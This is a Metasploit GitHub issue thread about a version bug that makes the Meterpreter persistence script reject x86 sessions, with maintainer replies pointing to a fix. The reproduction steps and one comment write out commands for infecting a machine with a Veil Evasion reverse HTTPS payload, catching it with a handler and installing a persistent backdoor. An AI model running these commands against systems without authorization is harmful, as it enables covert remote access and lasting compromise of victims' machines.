### ISSUE TITLE
x86/windows version of Meterpreter is not supported with this Script!

### ISSUE THREAD

**Issue by psyqologicaL** [rapid7/metasploit-framework#7227]
## Steps to reproduce

How'd you do it?

1. Infect a Windows 10 virtual machine with a python reverse https payload from Veil Evasion
2. set multi/handler
3. set PAYLOAD windows/meterpreter/rev_https
4. set LHOST [IP address]
5. set LPORT [Port]
6. run persistence -U -i 5 -p [Port] -r [IP address]

My Kali Linux OS is 64 bit (arch -> x86_64) and my Windows 10 virtual machine is 64 bit as well. I infected it with a reverse https payload created with Veil Evasion and I used my external IP and the opened port.

## Expected behavior

It should create a persistent script in C:\Users\UsersName\AppData\Local\Temp\ScriptName.vbs

## Current behavior

Instead, it outputs the error "x86/windows version of Meterpreter is not supported with this script"

### Metasploit version

Framework: 4.12.20-dev
Console     : 4.12.20-dev

### I installed Metasploit with:
- [X ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

Linux kali 4.6.0-kali-amd64 #1 SMP Debian 4.6.4-kali1 (2016-07-21) x86_64 GNU/Linux

**Comment by bcook-r7** [comment]
This was fixed last week in #7212 - it is resolved in 4.12.21 and later.

**Comment by aidenstewart** [comment]
I have this problem too, in version **4.12.22-dev**. i am trying to persistent a backdoor on a windows7 x86 system by this command on meterpreter:
`run persistence -U -i 5 -p [PORT] -r [IP]
`

**Comment by busterb** [comment]
kali-rolling only seems to ship 4.12.21-dev (which I verified works as expected). How did you install 4.12.22-dev @aidenstewart ?
